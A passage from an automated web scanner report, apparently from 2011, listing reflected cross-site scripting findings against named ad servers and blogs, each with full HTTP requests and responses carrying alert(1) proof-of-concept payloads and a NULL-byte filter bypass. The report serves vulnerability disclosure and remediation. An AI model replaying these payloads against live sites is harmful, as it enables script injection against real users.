Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c54b2"-alert(1)-"928c7dc083b was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1c54b2"-alert(1)-"928c7dc083b&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4825
Date: Sat, 14 May 2011 18:38:19 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
DYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1c54b2"-alert(1)-"928c7dc083b&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400189-240104510-42177866");
var wmode = "opaque";
...[SNIP]...

6.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94eb7"-alert(1)-"66f0a0282ef was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q94eb7"-alert(1)-"66f0a0282ef&client=ca-pub-4949689067833404&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4828
Date: Sat, 14 May 2011 18:39:03 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q94eb7"-alert(1)-"66f0a0282ef&client=ca-pub-4949689067833404&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400189-240104510-41904509");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

6.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6347b"-alert(1)-"1b7e1897702 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l6347b"-alert(1)-"1b7e1897702&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4828
Date: Sat, 14 May 2011 18:37:13 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/f/1a8/%2a/z%3B240104510%3B2-0%3B0%3B55400189%3B4307-300/250%3B41886722/41904509/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l6347b"-alert(1)-"1b7e1897702&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC
...[SNIP]...

6.7. http://ad.doubleclick.net/adj/india.reuters.com/widgets [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/india.reuters.com/widgets

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24831'-alert(1)-'e178f61f9c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/india.reuters.com/widgets;sz=234x60;ord=0.3587185984943062?&24831'-alert(1)-'e178f61f9c8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 279
Date: Sat, 14 May 2011 18:05:34 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/l;44306;0-0;0;25434165;4-234/60;0/0/0;;~okv=;sz=234x60;;24831'-alert(1)-'e178f61f9c8=1;~aopt=2/0/b8/0;~sscs=%3f">
...[SNIP]...

6.8. http://ad.doubleclick.net/adj/india.reuters.com/widgets [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/india.reuters.com/widgets

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbbc0'%3balert(1)//f43036c0423 was submitted in the sz parameter. This input was echoed as fbbc0';alert(1)//f43036c0423 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/india.reuters.com/widgets;sz=fbbc0'%3balert(1)//f43036c0423 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 274
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 18:04:48 GMT
Expires: Sat, 14 May 2011 18:04:48 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/p;44306;0-0;0;25434165;39648-768/768;0/0/0;;~okv=;sz=fbbc0';alert(1)//f43036c0423;~aopt=2/0/b8/0;~sscs=%3f"><im
...[SNIP]...

6.9. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload f72d4<script>alert(1)</script>d9d1668cc15 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1517799&pid=2279769f72d4<script>alert(1)</script>d9d1668cc15&zw=125&zh=125&url=http%3A//www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html&v=5&dct=Tunes%2C%20tastes%20blend%20at%20Moog%E2%80%99s%20Place%20Tunes%2C%20tastes%20-rmont%20music%20scene%2C%20bartender%2C%20lincoln%20inn%2C%20brewski&metakw=tom%20moog,vermont%20music%20scene,bartender,lincoln%20inn,brewski,seth%20yacovone,eames%20brothers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:29:52 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 1638


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</style>
   
               
                           java.lang.NumberFormatException: For input string: "2279769f72d4<script>alert(1)</script>d9d1668cc15"

   
                                                           </head>
...[SNIP]...

6.10. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload fc0b1--><script>alert(1)</script>96d3cdd0333 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1517799fc0b1--><script>alert(1)</script>96d3cdd0333&pid=2279769&zw=125&zh=125&url=http%3A//www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html&v=5&dct=Tunes%2C%20tastes%20blend%20at%20Moog%E2%80%99s%20Place%20Tunes%2C%20tastes%20-rmont%20music%20scene%2C%20bartender%2C%20lincoln%20inn%2C%20brewski&metakw=tom%20moog,vermont%20music%20scene,bartender,lincoln%20inn,brewski,seth%20yacovone,eames%20brothers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:29:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3478
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1517799fc0b1--><script>alert(1)</script>96d3cdd0333" -->
...[SNIP]...

6.11. http://blogs.naukri.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.naukri.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee7d0"><script>alert(1)</script>9455170581c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee7d0\"><script>alert(1)</script>9455170581c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ee7d0"><script>alert(1)</script>9455170581c=1 HTTP/1.1
Host: blogs.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:12:46 GMT
Server: NWS/1.0. (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
X-Pingback: http://blogs.naukri.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://blogs.naukri.com/?ee7d0\"><script>alert(1)</script>9455170581c=1">
...[SNIP]...

6.12. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00652ee<a>ed07bd10b85 was submitted in the REST URL parameter 1. This input was echoed as 652ee<a>ed07bd10b85 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00652ee<a>ed07bd10b85/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 14:17:29 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>ed07bd10b85/">weblog%00652ee<a>ed07bd10b85</a>
...[SNIP]...

6.13. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00839df"><script>alert(1)</script>d42176e2143 was submitted in the REST URL parameter 1. This input was echoed as 839df"><script>alert(1)</script>d42176e2143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00839df"><script>alert(1)</script>d42176e2143/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 14:17:28 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00839df"><script>alert(1)</script>d42176e2143/2006/">
...[SNIP]...

6.14. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2a10c<a>13a79934494 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/again2a10c<a>13a79934494/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 14:19:49 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 14 May 2011 14:19:49 GMT
Last-Modified: Sat, 14 May 2011 14:19:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/again2a10c<a>13a79934494/</h1>
...[SNIP]...

6.15. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36d2"><script>alert(1)</script>a7c80307e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a36d2\"><script>alert(1)</script>a7c80307e08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?a36d2"><script>alert(1)</script>a7c80307e08=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:14:51 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sat, 14 May 2011 14:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 215571

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?a36d2\"><script>alert(1)</script>a7c80307e08=1#preview" method="post">
...[SNIP]...

6.16. http://hosted.newsgator.com//NGBuzz/gateway.ashx/ngdsr [_dsrId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.newsgator.com
Path:   //NGBuzz/gateway.ashx/ngdsr

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload ad01c<script>alert(1)</script>aa81f47cd4d was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET //NGBuzz/gateway.ashx/ngdsr?C_=NGBuzz.Classes.ToolbarAPI%2CNGBuzz&M_=GetUserId&orgCode=RTRIN&_dsrId=_ngdsr_0ad01c<script>alert(1)</script>aa81f47cd4d HTTP/1.1
Host: hosted.newsgator.com
Proxy-Connection: keep-alive
Referer: http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:06:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Compressed-By: HttpCompress
Set-Cookie: NGToolbarTemp=1; expires=Sun, 15-May-2011 18:06:35 GMT; path=/
Cache-Control: private, max-age=30
Expires: Sat, 14 May 2011 18:07:05 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 150

window.ng_scriptload({"id":'_ngdsr_0ad01c<script>alert(1)</script>aa81f47cd4d',
"status":200,
"statusText":"OK",
"response":{"error":"","result":0}});

